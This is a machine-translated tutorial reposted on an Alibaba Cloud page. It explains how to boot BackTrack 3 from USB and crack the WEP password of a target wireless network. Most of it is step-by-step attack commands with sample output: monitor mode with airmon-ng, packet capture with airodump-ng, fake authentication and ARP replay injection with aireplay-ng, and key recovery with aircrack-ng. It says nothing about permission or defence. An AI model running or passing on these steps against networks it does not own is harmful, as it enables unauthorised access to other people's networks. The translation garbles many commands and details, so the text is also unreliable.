Detailed steps for backtrack3 (bt3) USB to crack WEP wireless network password

Last Update:2018-12-04 Source: Internet

Author: User

Tags crypt bssid

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

1. Start to create a USB flash drive:

The downloaded backtrack3 (bt3)
USB Version (in the end of the document, unzip the file bt3b141207.rar to the USB flash drive (larger than 1 GB ).

Boot
And bt3 folders are placed in the root directory of the USB flash drive. Open the boot folder and double-click "bootinst. Bat" to run the batch file. There will be four more files in the USB flash drive ."
Isolinux. Boot "" isolinux. cfg "" isolinux. bin "" syslinux. cfg"
(If you want the bt3 menu of the Chinese section, download the bt3 Chinese Language Pack. : Http://file.mofile.com/cn/docs/listallfiles.do extraction password: 4871454552251231. (I am using a free network hard drive with many advertisements. Some of my friends may not find it carefully. I will explain the approximate location. after entering the extracted code, search for the following words (red) in the middle and the following three links. The last two links can be downloaded.
We recommend flash get to download files at high speed (IE browser) (non-IE browser)
) Decompress the "Chinese package" in the compressed package and copy the *. LZM file to the bt3/modules directory of the USB flash drive to implement the bt3 culture .)

2. restart Windows to enter BIOS settings.

Set the frist boot device in the BIOS to a USB-HDD (or a USB--ZIP) and restart the boot from USB. The system enters the backtrack3 system.

3. Start cracking now

1. Enter the ifconfig command in the shell window., The following information is displayed:

Lo no wireless extensions.
Eth0 no wireless extensions.
Eth1 IEEE 802.11g Essid: "" nickname :""
Mode :( ......) frequency: 2.452 GHz Access Point: 00: 0f: B5: 88: AC: 82
Bit Rate: 0 kb/s TX-Power: 18 dBm sensiti.pdf = 0/3
Retry: Off RTS thr: Off fragment thr: Off
Encryption key: Off
Power Management: Off
Link quality = 0/94 signal level =-95 dBm noise level =-95 dBm
RX invalid nwid: 0 RX invalid crypt: 0 RX invalid frag: 0
TX excessive retries: 0 invalid MISC: 0 missed Beacon: 0

2. Find your wireless network card name
Here I am eth1. then start your Nic In moniter mode (enter airmon-ng start eth1 11 ). EnterIfconfigCommand to return the following information:

Lo no wireless extensions.
Eth0 no wireless extensions.
Eth1 IEEE 802.11g Essid: "" nickname :""
Mode: Monitor frequency: 2.452 GHz Access Point: 00: 0f: B5: 88: AC: 82
Bit Rate: 0 kb/s TX-Power: 18 dBm sensiti.pdf = 0/3
Retry: Off RTS thr: Off fragment thr: Off
Encryption key: Off
Power Management: Off
Link quality = 0/94 signal level =-95 dBm noise level =-95 dBm
RX invalid nwid: 0 RX invalid crypt: 0 RX invalid frag: 0
TX excessive retries: 0 invalid MISC: 0 missed Beacon: 0

3. Enter the command
Airodump-ng-C 11 -- bssid 00: 1A: 01: 8d: C3: B2-W outputs eth1.

In the command, "11" indicates the channel number to be cracked, "bssid" indicates the Mac physical address of the target, and "outputs" indicates the name of the package to be generated. Press enter to run.

4. Open another shell input.
Aireplay-ng-1 0-e targetnet-a 00: 1A: 01: 8d: C3: B2-h 00: A1: C1: D8: A5: B6 eth1

"Targetnet" indicates the target network name to be cracked. 00: 1A: 01: 8d: C3: B2 indicates the physical address of the target Mac, 00: A1: C1: D8: a5: B6 indicates the MAC address of the local Nic

5. Open another shell input.
Aireplay-ng-3-B 00: 1A: 01: 8d: C3: B2-h 00: A1: C1: D8: A5: B6 eth1

Obtain more data packets.

6. When the returned data volume reaches 10 thousand, it can be cracked..

Open another shell InputAircrack-ng-z-B 00: 1A: 01: 8d: C3: B2 outputs. Cap. If the attack fails, let the attacker capture packets until the attack is cracked.

Bt3 (backtrack3) USB Version list
Backtrack3 (bt3) USB Version list: (select a quick image)
BT download:
Torrent: http://www.remote-exploit.org/bt3b141207.rar.torrent
Http://www.offensive-security.com/bt3b141207.rar.torrent
FTP download:

Ftp://ftp.heanet.ie/mirrors/backtrack/bt3b141207.rar
Ftp://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.rar
Ftp://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
HTTP download:
Http://mirror.switch.ch/ftp/mirror/backtrack/bt3b141207.rar
Http://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.rar
Http://ftp.heanet.ie/mirrors/backtrack/bt3b141207.rar
Http://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
Http://ftp.belnet.be/mirror/backtrack/bt3b141207.rar
Http://backtrack.mick27.info/bt3b141207.rar

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More